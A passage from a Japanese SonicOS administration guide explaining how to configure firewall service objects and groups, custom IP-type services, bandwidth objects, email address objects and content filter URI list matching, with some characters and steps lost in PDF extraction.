サービスオブジェクトの設定

• オブジェクト > サービスオブジェクト (207 ページ)

• 既定のサービスオブジェクトおよびグループ (208 ページ)

• 定義済み IP ユーザ定義サービスオブジェクト用のプロトコル (209 ページ)

• 定義済みプロトコルを使用したサービスオブジェクトの追加 (211 ページ)

• カスタム IP 種別サービスの追加 (212 ページ)

• ユーザ定義サービスオブジェクトの編集 (216 ページ)

• ユーザ定義サービスオブジェクトの削除 (217 ページ)

• ユーザ定義サービスグループの追加 (217 ページ)

• ユーザ定義サービスグループの編集 (218 ページ)

• ユーザ定義サービスグループの削除 (218 ページ)

オブジェクト > サービスオブジェクト


サービスオブジェクトの設定207

サービスオブジェクトとサービスグループは、管理ビューの「ポリシー | オブジェクト > サービス

オブジェクト」ページで設定します。

SonicOS では拡張 IP プロトコルがサポートされており、ユーザはこれらのカスタムプロトコルに基づ

いてサービスオブジェクト、サービスグループ、およびアクセスルールを作成できます。定義済み

のプロトコルの一覧は、定義済み IP ユーザ定義サービスオブジェクト用のプロトコル (209 ページ)を参照してください。ネットワークに必要な固有の IP プロトコルを追加するには、カスタム IP 種別

サービスの追加 (212 ページ) を参照してください。

SonicWall セキュリティ装置では、ネットワークへのトラフィックの許可または拒否を決定するアク

セスルールを設定するために、サービスを使用します。 SonicWall セキュリティ装置には、事前定義

された既定のサービスオブジェクトと既定のサービスグループが用意されています。既定のサービ

スオブジェクトとサービスグループは編集可能ですが、削除することはできません。

特定の業務上の要件に合わせてユーザ定義サービスオブジェクトやユーザ定義サービスグループを

作成することができます。

ページの上部にある「ビュー」ドロップダウンリストを使用すると、規定およびユーザ定義サービ

スオブジェクトおよびグループの表示を制御できます。「すべての種類」を選択してユーザ定義エ

ントリと既定のエントリを表示し、「ユーザ定義」を選択してユーザ定義のみを表示するか、「既定」を選択して既定のサービスエントリのみを表示します。

既定のサービスオブジェクトおよびグループ既定のサービスオブジェクトとグループは SonicOS であらかじめ定義されており、削除はできません

が編集することはできます。既定のサービスではポートのみを編集できます。既定のサービスグループでは、含まれているサービスまたは除外されているサービスを変更できます。

「サービスオブジェクト」および「サービスグループ」テーブルには、サービスオブジェクトと

サービスグループに関する以下の属性が表示されます。

名前サービスの名前。

プロトコルサービスのプロトコル。

開始ポートサービスの開始ポート番号。

終了ポートサービスの終了ポート番号。

クラスエントリが「既定」 (システム) のサービスか「ユーザ定義」 (ユーザ) サービスかを示

します。

コメントコメントアイコンの上をマウスでポイントすると、サービスオブジェクトまたはグ

ループに関する情報が表示されます。ポップアップには以下の各項目が表示されます。

• 「参照先」 - サービスオブジェクトまたはグループを使用するファイアウォールに設定されているルールまたはポリシーのタイプのリストが、各種別の参照の数とともに表示されます。ルールまたはポリシータイプは、利用可能な場合に、「アクセスルール」、「NAT ポリシー」などのようにリンクとして表示されます。リンクをクリックすると、ページに移動して、サービスオブジェクトまたはグループを使用した特定のルールまたはポリシーのリストを表示できます。

• 「グループ (所属先)」 - サービスオブジェクトまたはグループを含むサービスグループまたは他の種別のグループのリストが表示されます。

設定サービスの「編集」アイコンと「削除」アイコンを表示します (既定のサービスは削

除できず、それに対応する「削除」アイコンは淡色表示になっています)。「編集」ア

イコンを選択すると、「サービスの編集」ダイアログが表示されます。既定のサービスではポートのみを編集できます。既定のサービスグループでは、含まれているサービスまたは除外されているサービスを変更できます。



既定のサービスグループは、既定のサービスオブジェクトおよび/または他の既定のサービスグルー

プのグループです。グループ名表示の左側にある三角形を選択すると、グループに含まれているす

べての既定のサービスとグループが表示されます。たとえば、「AD ディレクトリサービス」の既定

のグループには、いくつかのサービスオブジェクトとサービスグループが含まれています (AD ディレ

クトリサービスグループの詳細参照)。これらの複数のエントリをまとめてグループ化することで、

SonicOS を通してルールとポリシーで単一のサービスとして参照できます。

AD ディレクトリサービスグループの詳細

定義済み IP ユーザ定義サービスオブジェクト用のプロトコル

ICMP (1) インターネット制御メッセージプロトコル。エラーメッセージと制御メッセージの送

信に使用される TCP/IP プロトコルです。

IGMP (2) インターネットグループ管理プロトコル。 TCP/IP ネットワークにおけるマルチキャス

トグループの管理を制御するプロトコルです。

TCP (6) 転送制御プロトコル。 TCP/IP の TCP 部分です。 TCP は TCP/IP の転送プロトコルです。 TCPにより、メッセージが正確に、欠けることなく送信されます。

UDP (17) ユーザデータグラムプロトコル。 TCP/IP プロトコルスイートに含まれるプロトコルで

す。信頼性の高い送信が不要な場合に、 TCP の代わりに使用されます。

6over4 (41) 明示的なトンネルのないIPv4 ドメイン上での IPv6 の送信。 6over4 トラフィックは、 IPヘッダーの IP プロトコル番号が 41 に設定された IPv4 パケット内で送信されます。



GRE (47) 汎用ルーティングカプセル化。 IP トンネル内のさまざまな種類のプロトコルパケット

をカプセル化するために使用されるトンネルプロトコルです。ファイアウォールへの

仮想ポイントツーポイントリンクの作成や、 IP インターネットワーク経由での機器の

ルーティングに使用されます。

ESP (50) カプセル化セキュリティペイロード。 IPSec による柔軟なデータ転送手段として使用さ

れる、別のデータグラム内の IP データグラムをカプセル化する手法です。

AH (51) 認証ヘッダー。データ認証に加え、オプションでアンチリレーサービスを提供するセ

キュリティプロトコルです。 AH は保護するデータに埋め込みます (完全な IP データグ

ラム)。

ICMPv6/ND(58)

インターネットメッセージ制御プロトコルバージョン 6 向けの近隣者発見。近隣者発

見は、次の 5 つの異なる ICMP パケットタイプを定義します。ルータ要請メッセージと

ルータ広告メッセージのペア、近隣者要請メッセージと近隣者広告メッセージのペア、およびリダイレクトメッセージ。

EIGRP (88) 拡張内部ゲートウェイルーティングプロトコル。 IGRP を拡張したプロトコルです。優

れた収束特性と動作効率を実現し、リンク状態プロトコルの利点と距離ベクトルプロ

トコルの利点を同時に備えています。

OSPF (89) オープンショーテストパスファースト。ノード間の距離およびいくつかの品質パラメー

タに基づいて、 TCP/IP ネットワークにおける IP トラフィックのルーティングに適なパ

スを決定するルーティングプロトコルです。 OSPF は内部ゲートウェイプロトコル (IGP)の 1 つであり、自律システムの内部で動作するように設計されています。また、 OSPF はRIP プロトコルを置き換えるために開発されたリンク状態プロトコルであり、 RIP プロト

コル (距離ベクトルプロトコル) よりも少ないルータ数でトラフィックを更新できます。

PIM (103) プロトコル非依存マルチキャスト。 2 つある PIM 動作モードの 1 つです。

• PIM スパースモード (PIM-SM) では、ネットワーク内の小限のルータがデータを受け取るように、データの配信が制限されます。パケットは、 RP (ランデブーポイント ) で明示的に要求された場合にのみ送信されます。スパースモードでは、受信側が広く分散しているため、ダウンストリームのネットワークに送信されたデータグラムは必ずしも使用されないと想定されます。スパースモード使用の代償としては、明示的な Join メッセージの定期更新に依存していることと、 RPが必要であることです。

• PM デンスモード (PIM-DM) では、下流側のすべてのルータおよびホストが送信者からのマルチキャストデータグラムを受信すべきであると仮定し、ネットワーク全域にマルチキャストトラフィックのフラッドを発生させます。下流に近隣ルータがないルータは、不要なトラフィックを削除します。データグラムの反復的なフラッドとその後の削除を小限に抑えるために、 PIM DM では、送信元に直接接続しているルータによって送信される状態の再表示メッセージを使用します。

メモ：ファイアウォールは、マルチキャストトラフィックが上流/下流インターフェー

スを通過できるように、マルチキャストプロトコルとしてのみ設定できます。ファイ

アウォールは PIM ルータの役割を果たすことができません。

L2TP (115) レイヤ 2 トンネリングプロトコル。 PPP セッションをインターネット経由で実行するた

めのプロトコルです。 L2TP には暗号化機能はありませんが、リモートユーザから企業

LAN への仮想プライベートネットワーク (VPN) 接続を確立するために既定で IPsec が使

用されます。



定義済みプロトコルを使用したサービスオブジェ

クトの追加任意の定義済みプロトコルまたはサービスタイプに、ユーザ定義サービスを追加できます。

これらのプロトコルの定義については、定義済み IP ユーザ定義サービスオブジェクト用のプロトコ

ル (209 ページ) を参照してください。

作成したユーザ定義サービスは、すべて「サービスオブジェクト」テーブルに一覧表示されます。

ユーザ定義サービスグループを作成してユーザ定義サービスをグループ化することで、より簡単に

ポリシーを適用することができます。既定のサービスオブジェクトにリストされていないプロトコ

ルは、ユーザ定義サービスオブジェクトに追加できます。

定義済みプロトコルを使用してユーザ定義サービスオブジェクトに追加するには:


2 必要に応じて、「サービスオブジェクト」ボタンをクリックして、「サービスオブジェクト」

画面を表示します。

3 「追加」ボタンを選択します。「サービスの追加」ダイアログが表示されます。

4 このサービスオブジェクトに付ける説明的な名前を「名前」フィールドに入力します。

5 「プロトコル」ドロップダウンメニューで、 IP プロトコルの種類を選択します。ダイアログの

フィールドが変更されることがあります。

定義済みサービスタイプ

プロトコル IP 番号

ICMP 1

IGMP 2

TCP 6

UDP 17

6over4[l2tp] 41

GRE 47

IPsec ESP 50

IPsec AH 51

ICMPv6/ND 58

EIGRP 88

OSPF 89

PIM 103

L2TP[l2tp] 115



6 次に入力する内容は、選択した IP プロトコルによって異なります。

• TCP プロトコルと UDP プロトコルの場合、ポート範囲を指定します。

• ICMP、 IGMP、 OSPF、および PIM プロトコルの場合、「サブ種別」ドロップダウンメニュー

からサブ種別を選択します。

• その他のプロトコルの場合、それ以上の指定を行う必要はありません。

7 「追加」を選択します。「サービスオブジェクト」テーブルにサービスが表示されます。


カスタム IP 種別サービスの追加定義済み IP プロトコルタイプのみを使用している場合、セキュリティ装置でその他の IP プロトコル

タイプのトラフィックが検出されると、そのトラフィックは「識別不能」として破棄されます。ただし、 IANA (Internet Assigned Numbers Authority: http://www.iana.org/assignments/protocol-numbers) により

管理されている膨大な数の登録済み IP 種別のリストがあります。一般的でない (識別不能な) IP 種別

トラフィックは厳格に削除する方が安全ではありますが、機能が制限されます。

SonicOS では、任意の IP 種別を表すサービスオブジェクトを作成できます。これにより、任意の種別

の IP トラフィックを認識および制御するファイアウォールアクセスルールを作成できます。

認識と処理を実現するには、設定例 (212 ページ) に示すように、そのカスタム IP 種別サービスオブ

ジェクトのみを含むアクセスルールを作成する必要があります。

設定例管理者が、 RSVP (リソース予約プロトコル - IP タイプ 46) および SRP (Spectralink ラジオプロトコル - IP タイプ 119) を WLAN ゾーン (WLAN サブネット ) の全クライアントから LAN ゾーン (例えば 10.50.165.26など) のサーバまで許可する必要があるとします。管理者は、この 2 つのサービスを扱うユーザ定義

IP 種別サービスオブジェクトを定義できます。

ユーザ定義 IP 種別サービスオブジェクトを定義するには、以下の手順に従います。


2 必要に応じて、「サービスオブジェクト」ボタンをクリックして、「サービスオブジェクト」


3 「追加」を選択します。「サービスの追加」ダイアログが表示されます。

メモ： PIM のサブ種別は、 PIM SM 専用である以下のものを除き、 PIM-SM と PIM-DMの両方に適用されます。

• 種別 1: 登録 • 種別 2: 登録停止 • 種別 4: ブートストラップ • 種別 8: 候補 RP 広告

メモ：汎用サービス「すべて」では、カスタム IP 種別サービスオブジェクトが処理されませ

ん。つまり、 IP 種別 126 のカスタム IP 種別サービスオブジェクトを定義しただけでは、 IP 種別

126 トラフィックは既定の LAN > WAN 許可ルールで許可されません。



http://www.iana.org/assignments/protocol-numbers

4 このサービスオブジェクトに付ける説明的な名前を「名前」フィールドに入力します。

5 「プロトコル」ドロップダウンメニューから、「カスタム IP 種別」を選択します。

6 「プロトコル」ドロップダウンリストの右側のフィールドに、「ユーザ定義 IP タイプ」のプロ

トコル番号を入力します。


8 定義するユーザ定義サービスごとに手順 4 ～手順 7 を繰り返します。

9 終了したら、「閉じる」を選択します。

メモ：カスタム IP 種別の場合、「ポート範囲」と「サブ種別」フィールドは、「カスタ

ム IP 種別」として定義できないか、適用されません。

メモ：定義済み IP 種別に対してカスタムプロトコル種別サービスオブジェクトを定義し

ようとすると、許可されず、次のエラーメッセージが表示されます。



10 「サービスグループ」ボタンを選択します。

11 「追加」を選択します。「サービスグループの追加」ダイアログが表示されます。

12 「名前」フィールドに、サービスグループのわかりやすい名前を入力します (例： myServices)。

13 左側のリストから作成したユーザ定義サービスオブジェクトを選択し、右矢印ボタンをクリッ

クして右側のリストに移動します。

ヒント：複数のサービスオブジェクトを選択してから右矢印ボタンを選択すると、一度

にすべてのサービスを移動できます。



14 終了したら、「OK」を選択します。


16 「追加」をクリックして、 WLAN サブネットが myServices を使用してアクセスできるホスト用の

アドレスオブジェクトを作成します。

17 管理ビューで、「ポリシー | ルール > アクセスルール」ページに移動して、「WAN > LAN」ルー

ルを作成します。

18 「追加」を選択します。「ルールの追加」ダイアログが表示されます。



19 myServices に WLAN サブネットから 10.50.165.26 アドレスオブジェクトへのアクセスを許可す

るアクセスルールを定義します。

20 「追加」をクリックし、「閉じる」をクリックします。

これで、 IP プロトコル 46 および 119 のトラフィックが認識され、 WLAN サブネットから

10.50.165.26 への転送が許可されるようになります。

ユーザ定義サービスオブジェクトの編集「設定」の下にある編集アイコンを選択して、「サービスの編集」ダイアログでサービスオブジェ

クトを編集します。このダイアログには、「サービスの追加」ダイアログと同じ設定項目があります。定義済みプロトコルを使用したサービスオブジェクトの追加またはカスタム IP 種別サービスの

追加を参照してください。

メモ：双方向トラフィックのためにアクセスルールを作成する必要がある場合もありま

す。例えば、 myServices に 10.50.165.26 から WLAN サブネットへのアクセスを許可する、

LAN > WAN アクセスルールを追加する場合も考えられます。



ユーザ定義サービスオブジェクトの削除削除するサービスオブジェクトの行で、「設定」の下の「削除」アイコンをクリックして、個々の

カスタムサービスオブジェクトを削除します。「削除」ボタンをクリックして「すべて削除」を選

択すると、すべてのユーザ定義サービスを削除できます。 1 つまたは複数のカスタムサービスオブ

ジェクトを削除するには、目的のエントリのチェックボックスをオンにし、「削除」をクリックし、「選択した項目の削除」をクリックします。

ユーザ定義サービスグループの追加ユーザ定義サービスを追加した後で、サービス (既定のサービスを含む) のグループを作成し、グルー

プ内のサービスに同じポリシーを適用することができます。例えば、特定の時刻または曜日にのみ

SMTP トラフィックと POP3 トラフィックを許可するには、この 2 つのサービスをユーザ定義サービス

グループとして追加します。

ユーザ定義サービスグループを作成するには、以下の手順を実行します。


2 「サービスグループ」ボタンをクリックすると、「サービスグループ」画面が表示されます。

3 「追加」を選択します。「サービスグループの追加」ダイアログが表示されます。

4 ユーザ定義グループに付ける名前を「名前」フィールドに入力します。

5 左側の列のリストから、サービスを個別に選択します。 Ctrl キーを押しながらサービスを選択す

ることで、複数のサービスを選択することができます。

6 サービスをグループに追加するには、右矢印ボタンを選択します。

• グループからサービスを削除するには、右側の列のリストでサービスを個別に選択します。キーボードの Ctrl キーを押しながらサービスを選択することで、複数のサービスを

選択することもできます。

• サービスを削除するには、左矢印ボタンを選択します。

7 終了したら、「OK」を選択します。グループが「ユーザ定義サービスグループ」に追加され

ます。



ユーザ定義サービスグループの名前の左側にある三角形を選択すると、そのユーザ定義サービ

スグループ登録に含まれている個々のユーザ定義サービス、既定のサービス、ユーザ定義サー

ビスグループがすべて表示されます。

ユーザ定義サービスグループの編集「設定」列の編集アイコンを選択し、「サービスグループの編集」ダイアログでユーザ定義サービ

スグループを編集します。このダイアログには、「サービスグループの追加」ダイアログと同じ設

定項目があります。

ユーザ定義サービスグループを展開し、個々のサービスの編集アイコンを選択して、グループの

個々のサービスを編集することもできます。「サービスの編集」ダイアログが表示されます。このダイアログには、「サービスの追加」ダイアログと同じ設定項目が表示されます。

ユーザ定義サービスグループの削除削除するサービスグループの行で、「設定」の下の「削除」アイコンをクリックして、個々のユー

ザ定義サービスグループを削除します。「削除」ボタンをクリックして「すべて削除」を選択する

と、すべてのユーザ定義サービスグループを削除できます。 1 つ以上のカスタムサービスグループを

削除するには、目的のエントリのチェックボックスをオンにし、「削除」を選択し、「選択した項

目の削除」を選択します。



9

帯域幅オブジェクトの設定

• オブジェクト > 帯域幅オブジェクト (219 ページ)

• 帯域幅管理について (219 ページ)

• 帯域幅オブジェクトの設定 (220 ページ)

オブジェクト > 帯域幅オブジェクト

トピック :

• 帯域幅管理について (219 ページ)

• 帯域幅オブジェクトの設定 (220 ページ)

帯域幅管理について帯域幅管理の設定は、トラフィック等級に対する帯域幅制限を指定するポリシーに基づいています。完全な帯域幅管理ポリシーは、分類基準と帯域幅ルールという 2 つの部分で構成されます。

分類基準は、優先順位、保証帯域幅、大帯域幅など、実際のパラメータを指定し、帯域幅オブジェクト内で設定されます。分類基準は、具体的な基準との照合によってパケットの識別とトラフィック等級への分類を行います。

アクセスルール、アプリケーションルール、およびアクションオブジェクトでの帯域幅オブジェク

トの使用については、 SonicOS セキュリティ設定の技術文書のファイアウォール設定 > 帯域幅管理セ

クションを参照してください。


帯域幅オブジェクトの設定219

帯域幅オブジェクトの設定

帯域幅オブジェクトを追加または設定するには:

1 管理ビューで、ポリシー | オブジェクト > 帯域幅オブジェクトに移動します。


• 「追加」ボタンを選択して、新しい帯域幅オブジェクトを作成します。

• 編集する帯域幅オブジェクトの行の設定の下の編集ボタンを選択します。

帯域幅オブジェクトの追加または帯域幅オブジェクトの編集ダイアログが表示されます。ど

ちらのダイアログも同じ設定です。

3 「名前」フィールドに、帯域幅オブジェクトの説明的な名前を入力します。

4 「保証帯域幅」フィールドに、この帯域幅オブジェクトがあるトラフィック等級への提供を保証する帯域幅の量を入力します。ドロップダウンリストから番号を入力し、レート kbps (キロ

ビット /秒) または Mbps (メガビット /秒) を選択します。

5 「大帯域幅」フィールドに、この帯域幅オブジェクトがあるトラフィック等級に提供する帯域幅の大量を入力します。ドロップダウンリストから番号を入力し、レート kbps または

Mbps を選択します。

6 「トラフィック優先順位」ドロップダウンリストで、あるトラフィック等級に対してこの帯域

幅オブジェクトが付与する優先順位を選択します。高の優先順位は「0 リアルタイム」で、

これが既定値です。低の優先順位は「7 低」です。

複数のトラフィック等級が共有された帯域幅をめぐって競合している場合は、優先順位が指向の等級に優先権が与えられます。

7 「違反動作」ドロップダウンリストで、トラフィックが大帯域幅の設定値を上回った場合に

この帯域幅オブジェクトが実行する動作を選択します。

• 遅延は既定値で、過剰なトラフィックパケットをキューに登録し、送信可能になった時

点で送信することを示します。

• 破棄は、過剰なトラフィックパケットが直ちに破棄されることを示します。

8 「コメント」フィールドに、この帯域幅オブジェクトに対するコメントまたは説明のテキストを入力します。

メモ：複数のトラフィック等級が共有された帯域幅をめぐって競合している場合、実際に割り当てられる帯域幅はこの値よりも少なくなることがあります。



9 「基本」タブを選択します。

10 「IP 毎帯域幅管理を有効にする」チェックボックスを選択します。このオプションは、既定で

は選択されていません。「大帯域幅」フィールドが有効になります。

IP 毎帯域幅管理を有効にするが有効になっている場合、大の基本帯域幅の設定は親のトラ

フィック等級の下にある個々の IP に適用されます。

11 「大帯域幅」の値を入力します (数字)。既定値は 0 です。

12 関連するドロップダウンリストで、「kbps」または「Mbps」のいずれかの単位を選択します。

これらのオプションについては、「セキュリティ設定」の技術文書の「ファイアウォール設定

> 帯域幅管理」の下の「基本帯域幅の設定」セクションを参照してください。


メモ：アクセスルールでの帯域幅オブジェクトの設定は、詳細帯域幅管理での帯域幅管理の設

定 (22 ページ) およびグローバル帯域幅管理での帯域幅管理の設定 (24 ページ) に記載されていま

す。動作オブジェクトでの帯域幅オブジェクトの設定は、帯域幅管理を用いた動作について

(173 ページ) に記載されています。



10

電子メールアドレスオブジェクトの

設定

• オブジェクト > 電子メールアドレスオブジェクト (222 ページ)


• 電子メールアドレスオブジェクトの設定 (224 ページ)

オブジェクト > 電子メールアドレスオブ

ジェクト

「ポリシータイプ」が「SMTPクライアント」の場合、アプリケーションルールポリシーで使用する

電子メールアドレスオブジェクトを作成できます。電子メールアドレスオブジェクトには、ユーザ

のリストまたはドメイン全体を指定できます。

トピック :


• 電子メールアドレスオブジェクトの設定 (224 ページ)

電子メールアドレスオブジェクトについてアプリケーション制御では、電子メールアドレスオブジェクトとして個別電子メールアドレスリス

トを作成できます。「ポリシータイプ」が「SMTPクライアント」の場合、アプリケーションルール

ポリシーで電子メールアドレスオブジェクトのみを使用きます。電子メールアドレスオブジェクト

は、個別ユーザまたはドメイン全体を表すことができます。さらに、個別アドレスのリストをオブジェクトに追加することで、グループを表す電子メールアドレスオブジェクトを作成することもで


電子メールアドレスオブジェクトの設定222

きます。これにより、 SMTP クライアントのアプリケーションルールを作成するときに、ユーザグループを容易に対象に含めたり対象から除外したりできます。

例えば、サポートグループを表す電子メールアドレスオブジェクトを作成できます。

電子メールアドレスオブジェクトにグループを定義した後、そのグループを対象として含める SMTPクライアントポリシーまたは対象から除外する SMTP クライアントポリシーを作成します。

以下の図では、送信電子メールへの実行可能ファイルの添付を禁止するポリシーからサポートグループが除外されています。電子メールアドレスオブジェクトは、 SMTP クライアントポリシーの

「メール送信者」フィールドまたは「メール受信者」フィールドで使用できます。「メール送信者」フィールドは、電子メールの送信者を表します。「メール受信者」フィールドは、電子メールの受信者を表します。



アプリケーションルールでは Outlook Exchange または類似のアプリケーションからグループメンバー

を直接抽出することはできませんが、 Outlook のメンバーリストを使用して、グループメンバーがリ

ストされたテキストファイルを作成することはできます。その後、このグループの電子メールアド

レスオブジェクトを作成するときに、「ファイルから読み込み」ボタンを使用してテキストファイ

ルからリストをインポートできます。テキストファイル内で電子メールアドレスが 1 行に 1 つずつ

記述されていることを確認してください。

電子メールアドレスオブジェクトの設定

電子メールアドレスオブジェクトの設定を行うには:

1 管理ビューで、「ポリシー | オブジェクト > 電子メールアドレスオブジェクト」に移動します。

2 ページの上部にある「追加」を選択します。「電子メールアドレスオブジェクトの追加/編集」




3 「電子メールユーザオブジェクト名」フィールドに電子メールアドレスオブジェクトに対す

るわかりやすい名前を入力します。

4 「一致種別」で、以下のいずれかを選択します。

• 「完全一致」 - 入力した電子メールアドレスとの厳密な照合を行う場合に使用します。

• 「部分一致」 - 入力した電子メールアドレスの任意の部分で照合を行う場合に使用します。

• 「正規表現一致」 - 正規表現と電子メールアドレスとの照合を行う場合に使用します。正

規表現については、正規表現について (156 ページ) を参照してください。

5 「内容」フィールドに、照合する内容を入力します。

• 手動の場合:

a) 内容を入力します。

b) 「追加」を選択します。

c) 必要な要素をすべて追加し終えるまで、手順 a および手順 b を繰り返します。

例えば、ドメインに対して照合を行うには、前の手順で「部分一致」を選択し、「内容」フィールドでドメイン名を @ に続けて入力します (例: @SonicWall.com)。

個々のユーザに対して照合を行うには、前の手順で「完全一致」を選択し、「内容」フィールドに完全な電子メールアドレスを入力します

(例: [email protected])。

• 要素のリストをテキストファイルからインポートするには、「ファイルから読み込み」を

選択します。ファイル内の各要素は、 1 行に 1 つずつ記述されている必要があります。

ユーザのリストを含む電子メールアドレスオブジェクトを定義することで、アプリケーショ

ンルールを使用してグループをシミュレートできます。




11

コンテンツフィルタオブジェクトの

設定

• オブジェクト > コンテンツフィルタオブジェクト (226 ページ)

• コンテンツフィルタオブジェクトについて (227 ページ)

• URI リストオブジェクトの管理 (232 ページ)

• CFS 動作オブジェクトの管理 (240 ページ)

• CFS プロファイルオブジェクトの管理 (251 ページ)

• コンテンツフィルタオブジェクトの適用 (257 ページ)

オブジェクト > コンテンツフィルタオブ

ジェクト

SonicWall コンテンツフィルタサービス (CFS) バージョン 4.0 では、教育機関、企業、図書館、政府機関

向けにコンテンツフィルタが強化されています。こうした組織では、コンテンツフィルタオブジェク

トの活用により、ウェブサイトを制御したり、学生や従業員が IT 部門から支給されたコンピュータを

使用して組織のファイアウォールの背後からのアクセスを行ったりできるようになります。

トピック :

• コンテンツフィルタオブジェクトについて (227 ページ)

• URI リストオブジェクトの管理 (232 ページ)

• CFS 動作オブジェクトの管理 (240 ページ)

メモ：古いバージョンから CFS 4.0 へのアップグレードについては、 SonicWall™コンテンツフィ

ルタサービスアップグレードガイドを参照してください。また、これらのオブジェクトを CFSポリシーに適用するには、「SonicOS セキュリティ設定」の技術ドキュメントの「セキュリティ

サービス > コンテンツフィルタ」セクションを参照してください。


コンテンツフィルタオブジェクトの設定226

• CFS プロファイルオブジェクトの管理 (251 ページ)

• コンテンツフィルタオブジェクトの適用 (257 ページ)

コンテンツフィルタオブジェクトについてCFS では、セキュリティ保護されるオブジェクトをコンテンツのフィルタ処理に使用します。セキュ

アオブジェクトとその使用方法については、「SonicOS システムセットアップ」ドキュメントの

「ネットワーク > インターフェース」セクションの「SonicOS セキュアオブジェクト」を参照してく

ださい。 CFS では、以下のオブジェクトをコンテンツのフィルタ処理に使用します。

• URI リストオブジェクト - URI リストオブジェクトについて (227 ページ) を参照

• CFS 動作オブジェクト - CFS 動作オブジェクトについて (231 ページ) を参照

• CFS プロファイルオブジェクト - CFS プロファイルオブジェクトについて (231 ページ)

「CFS デフォルトアクション」および「CFS デフォルトプロファイル」以外のオブジェクトは、

SonicOS によって作成、追加、編集、または削除できます。

パスフレーズ機能と確認 (規約) 機能も、コンテンツフィルタオブジェクト内で設定されます。パス

フレーズ機能は、ユーザが正しいパスフレーズまたはパスワードを入力しない限り、ウェブアクセ

スを制限します。確認機能は、ユーザがウェブサイトに進むことを確認しない限り、ウェブアクセ

スを制限します。次を参照してください。

• パスワード機能について (231 ページ)

• 確認機能について (232 ページ)

URI リストオブジェクトについて

URI リストオブジェクトは、許可または禁止としてマーク可能な URI (Uniform Resource Identifiers) またはドメインのリストを定義します。この URI リストは、外部のファイルにエクスポートしたり、別

の URI リストにインポートしたりすることもできます。

URI リストオブジェクトには次の要件があります。

• 大で 128 個の URI リストオブジェクトが設定可能です。

• URI リストオブジェクトは、 1 個で大 5000 の URI をサポートします。小値は 1 です。

• 各 URI リストオブジェクトには、大 100 個のキーワードを設定できます。小値はゼロです。

トピック :

• URI と URI リストについて (228 ページ)

• キーワードとキーワードリストについて (228 ページ)

• URI リストオブジェクトの照合 (229 ページ)

• URI リストオブジェクトの使用 (230 ページ)

メモ： URI リストの処理は、 URI の種別よりも優先されます。



URI と URI リストについて

各 URI リストオブジェクトは、「URI リスト」に少なくとも 1 つの URI を持たなければなりません。

「URI リスト」に手動でエントリを入力または貼り付けたり、テキスト (.txt) ファイルから URI リス

トをインポートすることができます。このファイルは、手動で作成することも、以前に装置からエクスポートされたものを使用することもできます。ファイル内の各 URI はそれ自身の行にあります。

URI リストコンテンツをテキスト (.txt) ファイルにエクスポートしておくと、後でこのファイルからオ

ブジェクトをインポートすることができます。

URI とURI リストには次の要件があります。

• URI は大 255 文字です。

• 1 つの URI リスト内のすべての URI の長さの合計は、 URI 間の各改行 (復帰) コード用の 1 文字を

含めて、大 131,072 (1024*128) です。

• 定義上、 URI とはホストとパスが含まれている文字列です。ポートなどのコンテンツは現在サ

ポートされていませんが、キーワードを使用してこれらのコンテンツに一致させることができます。

• URI のホスト部分には、 IPv4 または IPv6 のアドレス文字列を指定できます。

• 各 URI には、大で 16 個のトークンを含むことができます。 URI 内のトークンは、次の文字か

らなる文字列です。

0 ～ 9a ～ zA ～ Z$ - _ + ! ' ( ) , .

• 各トークンの長さは、トークンを囲む区切り文字 (. または /) 用の 1 文字を含めて、大

64 文字です。

• 1 つ以上の有効なトークンの列を表すワイルドカードとして、アスタリスク (*) が使用で

きます。アスタリスクは、 1 つ以上の文字は表しません。

キーワードとキーワードリストについて

URI リストオブジェクトは、 URI リストを使用してウェブトラフィックをスキャンするときに URI を照

合します。これは、 torrent.com が seedtorrent.com と一致しないことを意味するトークンベー

スの一致アルゴリズムを使用します。キーワードリストは、 URI 一致をより柔軟にし、 URI リストオブ

ジェクトを URI の他の部分と一致させることによってトラフィックを照合できるようにします。

有効な URI の例無効な URI の例

• news.example.com • news.example.com/path • news.example.com/path/abc.txt • news.*.com/*.txt • 10.10.10.10 • 10.10.10.10/path • [2001:2002::2003]/path • [2001:2002::2003:*:2004]/path/*.

txt

ワイルドカード文字 (*) を誤って使用する

と、次のような無効な URI になることがあ

ります。 • example*.com • exa*ple.com • example.*.*.com

メモ：ワイルドカード文字は、 1 つ以上の文

字ではなく、 1 つ以上のトークンの系列を表

します。



ウェブトラフィックの URI 文字列 (ホスト +パス+クエリ文字列) にキーワードリストのサブストリング

がある場合、 URI リストオブジェクトは一致します。たとえば、「スポーツ」と「ニュース」がキー

ワードリストにある場合、 URI リストオブジェクトは、 www.extremsports.com, news.google.com/news/headlines?ned=us&hl=en、または www.yahoo.com/?q=sports と一致させることが

できます。

URI リストと同様に、キーワードリストに入力または貼り付けすることで手動でエントリを追加する

ことも、テキスト (.txt) ファイルからキーワードリストをインポートすることもできます。このファ

イルは、手動で作成することも、以前に装置からエクスポートされたものを使用することもできます。ファイル内の各キーワードはそれぞれの行にあります。

キーワードリストの内容を後でインポートできるテキストファイルにエクスポートできます。

キーワードとキーワードリストの用件:

• 各キーワードは、大で 255 文字の印刷可能な ASCII 文字を含むことができます。

• 1 つのキーワードリスト内のキーワードの大結合長は、キーワード間の改行 (改行) ごとに 1文字を含む 1024 * 2 に制限されています。

URI リストオブジェクトの照合

URI リストオブジェクトの照合処理は、トークンに基づいています。有効なトークン系列は、 "." または "/" のような特定の文字で結合された 1 つ以上のトークンで構成されます。 URI は 1 つのトーク

ン系列を表しています。例えば、 www.example.com という URI は "www"、 "example"、 "com" が"." で結合されたトークン系列です。通常、ある URI に URI リストオブジェクト内の URI のいずれか

が含まれている場合、このリストオブジェクトはその URI に一致します。

トピック :

• 標準一致 (229 ページ)

• ワイルドカード一致 (230 ページ)

• IPv6 アドレスの照合 (230 ページ)

• IPv6 のワイルドカード照合 (230 ページ)

標準一致

リストオブジェクトに example.com のような URI が含まれている場合、そのオブジェクトは次のよ

うに定義された URI に一致します。

[<トークン系列>(.|/)]example.com[(.|/)<トークン系列>]

例えば、この URI リストオブジェクトは次の URI のいずれにも一致します。

• example.com

• www.example.com

• example.com.uk

• www.example.com.uk

• example.com/path

この URI リストオブジェクトは、 specialexample.com という URI には一致しません。

specialexample の部分が example とは異なるトークンであると認識されるからです。



ワイルドカード一致

ワイルドカード一致がサポートされています。アスタリスク (*) がワイルドカード文字として使用さ

れ、この文字はトークンの有効な系列を表します。リストオブジェクトに example.*.com のよう

な URI が含まれている場合、そのリストオブジェクトは次のように定義された URI に一致します。

[<トークン系列>(.|/)]example.<トークン系列>.com[(.|/)<トークン系列>]

